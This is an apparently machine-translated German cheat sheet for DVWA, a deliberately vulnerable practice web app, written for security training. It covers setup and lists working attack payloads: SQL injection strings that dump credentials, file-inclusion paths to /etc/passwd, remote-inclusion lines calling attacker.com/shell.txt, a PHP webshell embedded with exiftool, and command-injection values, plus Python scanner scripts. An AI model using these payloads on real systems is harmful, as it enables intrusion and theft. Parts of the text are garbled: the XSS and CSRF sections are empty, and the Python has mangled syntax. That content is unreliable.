Zum Inhalt

DVWA (Damn Vulnerable Web Application) Cheat Sheet

generieren

Überblick

Damn Vulnerable Web Application (DVWA) ist eine bewusst gefährdete Web-Anwendung für Sicherheitsexperten, Studenten und Enthusiasten, um Web-Anwendung Sicherheitstests in einer rechtlichen und kontrollierten Umgebung zu üben. Entwickelt von Ryan Dewhurst und vom DVWA-Team gepflegt, enthält diese PHP/MySQL Web-Anwendung zahlreiche absichtliche Sicherheitslücken, die in Web-Anwendungen häufig gefundene Sicherheitslücken spiegeln. DVWA dient als Bildungsplattform, mit der Nutzer verstehen können, wie Web-Anwendungslücken funktionieren, wie sie ausgenutzt werden können, und vor allem, wie sie verhindert werden können.

Die Anwendung ist um die OWASP Top 10 Schwachstellen strukturiert und umfasst zusätzliche Sicherheitsprobleme, die ein breites Spektrum an Web Application Security-Problemen abdecken. Jede Schwachstelle in DVWA ist mit mehreren Schwierigkeitsstufen implementiert - Low, Medium und High - so dass Anwender ihre Fähigkeiten und ihr Verständnis schrittweise entwickeln können. Der Low Level hat in der Regel minimale oder keine Sicherheitskontrollen, Medium Level implementiert einige grundlegende Schutzmaßnahmen, die umgangen werden können, und High Level beinhaltet robustere Sicherheitsmaßnahmen, die fortschrittliche Techniken erfordern auszunutzen.

Der Bildungswert der DVWA erstreckt sich über die einfache Verwundbarkeitsausbeutung. Die Anwendung umfasst Quellcode-Anzeigefähigkeiten, so dass Benutzer den gefährdeten Code untersuchen und die Ursachen von Sicherheitsproblemen verstehen. Diese Funktion ist besonders wertvoll für Entwickler, die sichere Kodierungspraktiken lernen wollen, indem sie Beispiele für verletzliche und sichere Implementierungen sehen. Die Anwendung bietet auch Hinweise und Anleitungen für jede Schwachstelle, so dass sie für Anfänger zugänglich ist, während sie für erfahrene Praktizierende immer noch herausfordern.

Die Plattform unterstützt verschiedene Lernansätze, vom individuellen Selbststudium bis zum Unterrichts- und Sicherheitstraining. Das modulare Design ermöglicht es den Ausbildern, sich auf bestimmte Sicherheitstypen zu konzentrieren oder umfassende Sicherheitsbewertungsübungen zu erstellen. DVWA hat sich zu einem Standard-Tool in der Cybersicherheit Bildung, von Universitäten, Ausbildungsorganisationen und Sicherheitsexperten weltweit verwendet, um praktische Web Application Security Fähigkeiten zu entwickeln.

Installation

Docker Installation (empfohlen)

```bash

Pull DVWA Docker image

docker pull vulnerables/web-dvwa

Run DVWA container

docker run --rm -it -p 80:80 vulnerables/web-dvwa

Run with persistent data

docker run -d -p 80:80 --name dvwa vulnerables/web-dvwa

Access DVWA

Navigate to http://localhost in your browser

Default credentials: admin/password

Stop container

docker stop dvwa

Remove container

docker rm dvwa

Run with custom port

docker run -d -p 8080:80 --name dvwa vulnerables/web-dvwa ```_

Docker komponiert Installation

```yaml

Create docker-compose.yml

cat << 'EOF' > docker-compose.yml version: '3.8'

services: dvwa: image: vulnerables/web-dvwa container_name: dvwa ports: - "80: 80" environment: - MYSQL_ROOT_PASSWORD=dvwa - MYSQL_DATABASE=dvwa - MYSQL_USER=dvwa - MYSQL_PASSWORD=p@ssw0rd volumes: - dvwa_data: /var/lib/mysql restart: unless-stopped

volumes: dvwa_data: EOF

Start DVWA

docker-compose up -d

View logs

docker-compose logs -f

Stop DVWA

docker-compose down

Stop and remove volumes

docker-compose down -v ```_

Manuelle Installation auf Ubuntu/Debian

```bash

Update system

sudo apt update && sudo apt upgrade -y

Install LAMP stack

sudo apt install apache2 mysql-server php php-mysql php-gd libapache2-mod-php -y

Start services

sudo systemctl start apache2 sudo systemctl start mysql sudo systemctl enable apache2 sudo systemctl enable mysql

Secure MySQL installation

sudo mysql_secure_installation

Create database and user

sudo mysql -u root -p ``<< 'EOF' CREATE DATABASE dvwa; CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd'; GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost'; FLUSH PRIVILEGES; EXIT; EOF

Download DVWA

cd /var/www/html sudo git clone https://github.com/digininja/DVWA.git dvwa

Set permissions

sudo chown -R www-data:www-data /var/www/html/dvwa sudo chmod -R 755 /var/www/html/dvwa

Configure DVWA

sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php

Edit configuration

sudo nano /var/www/html/dvwa/config/config.inc.php

Update database settings:

$_DVWA['db_user'] = 'dvwa';

$_DVWA['db_password'] = 'p@ssw0rd';

$_DVWA['db_database'] = 'dvwa';

Configure PHP

sudo nano /etc/php/*/apache2/php.ini

Set: allow_url_include = On

Set: allow_url_fopen = On

Restart Apache

sudo systemctl restart apache2

Access DVWA at http://localhost/dvwa

```_

Installation auf CentOS/RHEL

```bash

Install EPEL repository

sudo yum install epel-release -y

Install LAMP stack

sudo yum install httpd mariadb-server php php-mysql php-gd -y

Start services

sudo systemctl start httpd sudo systemctl start mariadb sudo systemctl enable httpd sudo systemctl enable mariadb

Secure MariaDB

sudo mysql_secure_installation

Create database

sudo mysql -u root -p << 'EOF' CREATE DATABASE dvwa; CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd'; GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost'; FLUSH PRIVILEGES; EXIT; EOF

Download and configure DVWA

cd /var/www/html sudo git clone https://github.com/digininja/DVWA.git dvwa sudo chown -R apache:apache /var/www/html/dvwa sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php

Configure SELinux (if enabled)

sudo setsebool -P httpd_can_network_connect 1 sudo setsebool -P httpd_unified 1

Configure firewall

sudo firewall-cmd --permanent --add-service=http sudo firewall-cmd --reload

Restart Apache

sudo systemctl restart httpd ```_

Windows Installation (XAMPP)

```powershell

Download and install XAMPP

https://www.apachefriends.org/download.html

Start XAMPP Control Panel

Start Apache and MySQL services

Download DVWA

Extract to C:\xampp\htdocs\dvwa

Configure database

Open phpMyAdmin (http://localhost/phpmyadmin)

Create database 'dvwa'

Create user 'dvwa' with password 'p@ssw0rd'

Configure DVWA

Copy config.inc.php.dist to config.inc.php

Edit database settings in config.inc.php

Access DVWA at http://localhost/dvwa

```_

Initial Setup und Konfiguration

Erst-Zeit-Setup

```bash

Access DVWA setup page

Navigate to http://localhost/dvwa/setup.php

Check system requirements

Ensure all requirements are met (green checkmarks)

Create/Reset Database

Click "Create / Reset Database" button

Login to DVWA

Navigate to http://localhost/dvwa/login.php

Username: admin

Password: password

Change default password (recommended)

Go to DVWA Security ->`` Change Password

```_

Sicherheitsebene Konfiguration

```bash

Set security level

Navigate to DVWA Security

Low Security Level

- Minimal security controls

- Basic vulnerabilities easily exploitable

- Ideal for beginners

Medium Security Level

- Some security controls implemented

- Requires intermediate techniques

- Good for skill development

High Security Level

- Robust security measures

- Advanced exploitation techniques required

- Challenging for experienced users

Impossible Security Level

- Secure implementation

- Shows how vulnerabilities should be fixed

- Educational reference for developers

```_

Benutzermanagement

```bash

Default users in DVWA:

admin:password (Administrator)

gordonb:abc123 (User)

1337:charley (User)

pablo:letmein (User)

smithy:password (User)

Add new users (via database)

mysql -u dvwa -p dvwa << 'EOF' INSERT INTO users (user_id, first_name, last_name, user, password, avatar, last_login, failed_login) VALUES (6, 'Test', 'User', 'testuser', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'http://localhost/dvwa/hackable/users/testuser.jpg', '0000-00-00 00:00:00', 0); EOF

Password hash for 'password': 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

```_

Schwachstellenmodule

SQL Injection

```bash

Low Security Level

Basic SQL injection

' OR '1'='1 ' OR 1=1 -- ' OR 1=1 #

Extract database information

' UNION SELECT null, version() # ' UNION SELECT null, database() # ' UNION SELECT null, user() #

Extract table names

' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() #

Extract column names

' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' #

Extract user data

' UNION SELECT user, password FROM users #

Medium Security Level

Bypass basic filtering

1' OR '1'='1 1' OR 1=1 -- 1' UNION SELECT null, version() --

High Security Level

Use advanced techniques

1' OR '1'='1' LIMIT 1 -- 1' UNION SELECT null, CONCAT(user,':',password) FROM users LIMIT 1 -- ```_

SQL Injection (Blind)

```bash

Boolean-based blind SQL injection

Low Security Level

1' AND 1=1 # (True condition) 1' AND 1=2 # (False condition)

Extract database name length

1' AND LENGTH(database())=4 #

Extract database name character by character

1' AND SUBSTRING(database(),1,1)='d' # 1' AND SUBSTRING(database(),2,1)='v' # 1' AND SUBSTRING(database(),3,1)='w' # 1' AND SUBSTRING(database(),4,1)='a' #

Time-based blind SQL injection

1' AND SLEEP(5) # 1' AND IF(LENGTH(database())=4,SLEEP(5),0) #

Extract user count

1' AND (SELECT COUNT(*) FROM users)=5 #

Extract admin password length

1' AND LENGTH((SELECT password FROM users WHERE user='admin'))=32 # ```_

Cross-Site Scripting (XSS)

```bash

Reflected XSS

Low Security Level

Medium Security Level

Bypass basic filtering

High Security Level

Advanced bypass techniques

Cookie stealing payload

Keylogger payload

```_

Cross-Site Scripting (gespeichert)

```bash

Stored XSS in message/comment fields

Low Security Level

Persistent cookie stealing

Admin session hijacking

BeEF hook

Medium/High Security Level

Use encoding and obfuscation

```_

Cross-Site Request Forgery (CSRF)

```html

```_

Datei Inclusion

```bash

Local File Inclusion (LFI)

Low Security Level

page=../../../etc/passwd page=../../../etc/shadow page=../../../var/log/apache2/access.log page=../../../proc/version page=../../../home/user/.bash_history

Windows LFI

page=../../../windows/system32/drivers/etc/hosts page=../../../windows/win.ini page=../../../windows/system.ini

PHP wrapper exploitation

page=php://filter/convert.base64-encode/resource=../../../etc/passwd page=php://filter/read=string.rot13/resource=../../../etc/passwd

Log poisoning

First, poison the log file via User-Agent

Then include the log file

page=../../../var/log/apache2/access.log

Medium Security Level

Bypass basic filtering

page=....//....//....//etc/passwd page=..././..././..././etc/passwd

High Security Level

Use null byte injection (older PHP versions)

page=../../../etc/passwd%00 page=../../../etc/passwd%00.php

Remote File Inclusion (RFI)

If allow_url_include is enabled

page=http://attacker.com/shell.txt page=ftp://attacker.com/shell.txt ```_

Datei hochladen

```bash

Low Security Level

Upload PHP shell directly

Save as shell.php and upload

Medium Security Level

Bypass MIME type filtering

Change Content-Type to image/jpeg

Or use double extension: shell.php.jpg

Bypass file extension filtering

shell.php shell.php5 shell.phtml shell.phar

High Security Level

Embed PHP in image

Create valid image with embedded PHP

exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

Rename to image.php

GIF header bypass

GIF89a

PNG bypass with PHP

Create PNG with PHP payload in metadata

```_

Befehlsinjektion

```bash

Low Security Level

Basic command injection

127.0.0.1; ls 127.0.0.1 && whoami 127.0.0.1|cat /etc/passwd 127.0.0.1 & id

Windows command injection

127.0.0.1 & dir 127.0.0.1 && type C:\windows\win.ini 127.0.0.1|net user

Medium Security Level

Bypass basic filtering

127.0.0.1;ls 127.0.0.1&&whoami; 127.0.0.1|cat$\\{IFS\\}/etc/passwd

High Security Level

Advanced bypass techniques

127.0.0.1|cat</etc/passwd 127.0.0.1|cat<>/etc/passwd 127.0.0.1|\\{cat,/etc/passwd\\} ```_

Weak Session IDs

```bash

Analyze session ID patterns

Low Security Level

Session IDs increment sequentially

Predict next session ID

Medium Security Level

Session IDs based on timestamp

Calculate based on time

High Security Level

Session IDs use MD5 of timestamp

Still predictable with time knowledge

Session hijacking techniques

Capture session cookies

Use browser developer tools

Intercept with Burp Suite

Session fixation attacks

```_

Unsicher CAPTCHA

```bash

Low Security Level

CAPTCHA validation bypass

Remove step parameter

Modify passed parameter

Medium Security Level

Bypass CAPTCHA validation

Reuse passed parameter

Manipulate form data

High Security Level

Advanced CAPTCHA bypass

Analyze CAPTCHA generation

Exploit implementation flaws

Automated bypass techniques

Use OCR tools

Machine learning approaches

Pattern recognition

```_

Prüfmethoden

Manueller Testansatz

```bash

1. Reconnaissance

- Examine source code

- Identify input fields

- Analyze client-side validation

- Check for hidden parameters

2. Input Validation Testing

- Test all input fields

- Try various payloads

- Check for filtering mechanisms

- Test boundary conditions

3. Authentication Testing

- Test login mechanisms

- Check session management

- Test password policies

- Verify logout functionality

4. Authorization Testing

- Test access controls

- Check privilege escalation

- Verify user roles

- Test direct object references

5. Session Management Testing

- Analyze session tokens

- Test session fixation

- Check session timeout

- Verify secure flags

```_

Automatisierte Testwerkzeuge

```bash

SQLmap for SQL injection

sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit;=Submit" --cookie="PHPSESSID=your_session_id; security=low" --dbs

Nikto web scanner

nikto -h http://localhost/dvwa/

OWASP ZAP

Configure proxy settings

Spider the application

Run active scan

Burp Suite

Configure browser proxy

Intercept requests

Use scanner and intruder

w3af web application scanner

w3af_console target http://localhost/dvwa/ plugins audit sql_injection,xss,csrf crawl web_spider start ```_

Individuelle Testing Scripts

```python

!/usr/bin/env python3

DVWA SQL injection tester

import requests import sys

def test_sql_injection(base_url, session_cookie): payloads = [ "' OR '1'='1", "' OR 1=1 --", "' OR 1=1 #", "' UNION SELECT null, version() #", "' UNION SELECT user, password FROM users #" ]

headers = \\\\{
    'Cookie': f'PHPSESSID=\\\\{session_cookie\\\\}; security=low'
\\\\}

for payload in payloads:
    url = f"\\\\{base_url\\\\}/vulnerabilities/sqli/?id=\\\\{payload\\\\}&Submit;=Submit"

    try:
        response = requests.get(url, headers=headers)
        if 'admin' in response.text or 'root' in response.text:
            print(f"[+] Successful payload: \\\\{payload\\\\}")
            print(f"[+] Response contains sensitive data")
        else:
            print(f"[-] Failed payload: \\\\{payload\\\\}")
    except Exception as e:
        print(f"[!] Error with payload \\\\{payload\\\\}: \\\\{e\\\\}")

if name == "main": if len(sys.argv) != 3: print("Usage: python3 dvwa_sqli_test.py ") sys.exit(1)

base_url = sys.argv[1]
session_cookie = sys.argv[2]
test_sql_injection(base_url, session_cookie)

```_

Ausbildungsmaßnahmen

Übungen für Anfänger

```bash

Exercise 1: Basic SQL Injection

Objective: Extract all usernames and passwords

Steps:

1. Set security level to Low

2. Navigate to SQL Injection module

3. Try basic payloads

4. Extract database information

5. Dump user credentials

Exercise 2: Reflected XSS

Objective: Execute JavaScript in victim's browser

Steps:

1. Find XSS vulnerable parameter

2. Craft XSS payload

3. Test different bypass techniques

4. Create cookie stealing payload

Exercise 3: File Upload Bypass

Objective: Upload and execute PHP shell

Steps:

1. Create PHP shell

2. Try direct upload

3. Bypass file type restrictions

4. Execute commands through shell

```_

Intermediate Übungen

```bash

Exercise 4: Blind SQL Injection

Objective: Extract data without direct output

Steps:

1. Identify blind injection point

2. Use boolean-based techniques

3. Extract database name

4. Extract user passwords

5. Automate extraction process

Exercise 5: CSRF Attack Chain

Objective: Change admin password via CSRF

Steps:

1. Analyze password change functionality

2. Create CSRF proof of concept

3. Test different delivery methods

4. Bypass CSRF protections

Exercise 6: LFI to RCE

Objective: Achieve code execution via LFI

Steps:

1. Find LFI vulnerability

2. Test file inclusion

3. Poison log files

4. Achieve remote code execution

```_

Erweiterte Übungen

```bash

Exercise 7: Multi-Stage Attack

Objective: Combine multiple vulnerabilities

Steps:

1. Use XSS to steal admin session

2. Use CSRF to change admin password

3. Login as admin

4. Upload shell via file upload

5. Achieve system access

Exercise 8: Session Prediction

Objective: Predict and hijack sessions

Steps:

1. Analyze session ID generation

2. Identify patterns

3. Predict valid session IDs

4. Hijack user sessions

Exercise 9: Complete Compromise

Objective: Full application takeover

Steps:

1. Enumerate all vulnerabilities

2. Chain exploits together

3. Escalate privileges

4. Maintain persistence

5. Document attack path

```_

Integration von Sicherheitswerkzeugen

Integration von Burp Suite

```bash

Configure Burp Suite proxy

Browser settings: 127.0.0.1:8080

Burp Suite testing workflow

1. Spider DVWA application

2. Review site map

3. Send requests to Repeater

4. Test with Intruder

5. Run active scanner

Custom Burp extensions for DVWA

- DVWA Security Level Changer

- Automated payload generator

- Custom session handling

```_

OWASP ZAP Integration

```bash

ZAP automated scan

zap-baseline.py -t http://localhost/dvwa/

ZAP full scan

zap-full-scan.py -t http://localhost/dvwa/

ZAP API usage

Start ZAP daemon

zap.sh -daemon -port 8080

Spider application

curl "http://localhost:8080/JSON/spider/action/scan/?url=http://localhost/dvwa/"

Active scan

curl "http://localhost:8080/JSON/ascan/action/scan/?url=http://localhost/dvwa/"

Generate report

curl "http://localhost:8080/OTHER/core/other/htmlreport/" > dvwa_report.html ```_

Benutzerdefinierte Sicherheitsscanner

```python

!/usr/bin/env python3

DVWA comprehensive scanner

import requests import re import time from urllib.parse import urljoin

class DVWAScanner: def init(self, base_url, session_cookie): self.base_url = base_url self.session = requests.Session() self.session.cookies.set('PHPSESSID', session_cookie) self.session.cookies.set('security', 'low')

def test_sql_injection(self):
    print("[*] Testing SQL Injection...")
    url = urljoin(self.base_url, '/vulnerabilities/sqli/')

    payloads = [
        "' OR '1'='1",
        "' UNION SELECT user, password FROM users #"
    ]

    for payload in payloads:
        params = \\\\{'id': payload, 'Submit': 'Submit'\\\\}
        response = self.session.get(url, params=params)

        if 'admin' in response.text:
            print(f"[+] SQL Injection successful: \\\\{payload\\\\}")
            return True

    print("[-] SQL Injection not found")
    return False

def test_xss(self):
    print("[*] Testing XSS...")
    url = urljoin(self.base_url, '/vulnerabilities/xss_r/')

    payloads = [
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert('XSS')>"
    ]

    for payload in payloads:
        params = \\\\{'name': payload\\\\}
        response = self.session.get(url, params=params)

        if payload in response.text:
            print(f"[+] XSS successful: \\\\{payload\\\\}")
            return True

    print("[-] XSS not found")
    return False

def test_file_inclusion(self):
    print("[*] Testing File Inclusion...")
    url = urljoin(self.base_url, '/vulnerabilities/fi/')

    payloads = [
        "../../../etc/passwd",
        "php://filter/convert.base64-encode/resource=../../../etc/passwd"
    ]

    for payload in payloads:
        params = \\\\{'page': payload\\\\}
        response = self.session.get(url, params=params)

        if 'root:' in response.text or 'cm9vdDo' in response.text:
            print(f"[+] File Inclusion successful: \\\\{payload\\\\}")
            return True

    print("[-] File Inclusion not found")
    return False

def run_scan(self):
    print(f"[*] Starting DVWA scan on \\\\{self.base_url\\\\}")

    results = \\\\{
        'sql_injection': self.test_sql_injection(),
        'xss': self.test_xss(),
        'file_inclusion': self.test_file_inclusion()
    \\\\}

    print("\n[*] Scan Results:")
    for vuln, found in results.items():
        status = "VULNERABLE" if found else "NOT FOUND"
        print(f"  \\\\{vuln\\\\}: \\\\{status\\\\}")

    return results

if name == "main": scanner = DVWAScanner("http://localhost/dvwa", "your_session_id") scanner.run_scan() ```_

Best Practices fürs Lernen

Fortschrittlicher Lernpfad

```bash

Phase 1: Understanding Basics (Low Security)

- Learn how vulnerabilities work

- Practice basic exploitation

- Understand attack vectors

- Review source code

Phase 2: Bypass Techniques (Medium Security)

- Learn common protections

- Practice bypass methods

- Understand filtering mechanisms

- Develop advanced payloads

Phase 3: Advanced Exploitation (High Security)

- Master complex techniques

- Chain multiple vulnerabilities

- Develop custom exploits

- Understand defense mechanisms

Phase 4: Secure Development (Impossible Security)

- Study secure implementations

- Learn defensive coding

- Understand security controls

- Apply lessons to real applications

```_

Dokumentation und Reporting

```bash

Create learning journal

mkdir ~/dvwa_learning cd ~/dvwa_learning

Document each vulnerability

cat << 'EOF' > sql_injection_notes.md

SQL Injection Learning Notes

Low Security Level

  • Vulnerability: Direct SQL injection in id parameter
  • Payload: ' OR '1'='1
  • Result: Bypassed authentication
  • Root Cause: No input validation

Medium Security Level

  • Protection: Basic filtering of quotes
  • Bypass: Using numeric injection
  • Payload: 1 OR 1=1
  • Lesson: Client-side filtering insufficient

High Security Level

  • Protection: Prepared statements
  • Result: Injection prevented
  • Lesson: Proper parameterization prevents SQLi EOF

Create exploit database

cat << 'EOF' > exploits.txt

DVWA Exploit Database

SQL Injection

' OR '1'='1 ' UNION SELECT user, password FROM users #

XSS

File Inclusion

../../../etc/passwd php://filter/convert.base64-encode/resource=../../../etc/passwd EOF ```_

Sichere Testumgebung

```bash

Isolated network setup

Use VirtualBox/VMware

Create isolated network segment

No internet access for vulnerable systems

Backup and restore

Create VM snapshots before testing

Document system state

Reset between exercises

Monitoring and logging

Enable web server logs

Monitor system activity

Document all actions

Review logs for learning

```_

--

** Sicherheitshinweis*: DVWA (Damn Vulnerable Web Application) ist absichtlich gefährdet und sollte nur in isolierten, kontrollierten Umgebungen für Bildungszwecke verwendet werden. Stellen Sie niemals DVWA in Produktionsnetzwerken oder Systemen aus dem Internet zur Verfügung. Die Anwendung enthält ernsthafte Sicherheitslücken, die die Systemsicherheit beeinträchtigen könnten, wenn sie ausgesetzt sind. Verwenden Sie DVWA immer in virtuellen Maschinen oder in isolierten Laborumgebungen. Dieses Tool ist für das Lernen Web Application Security konzipiert und sollte verantwortungsvoll von Sicherheitsexperten, Studenten und Forschern verwendet werden.

📚 Zusätzliche Ressourcen: - DVWA Official GitHub Repository - DVWA-Dokumentation - OWASP Top 10 - Web Application Security Testing Guide